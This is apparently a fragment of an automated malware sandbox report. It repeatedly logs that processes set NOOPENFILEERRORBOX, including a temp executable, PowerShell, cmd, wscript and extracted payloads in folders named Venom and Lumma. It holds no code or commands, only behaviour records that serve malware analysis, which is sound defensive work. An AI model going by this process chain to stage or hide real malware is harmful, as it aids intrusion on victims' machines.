Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Process information set: NOOPENFILEERRORBOX
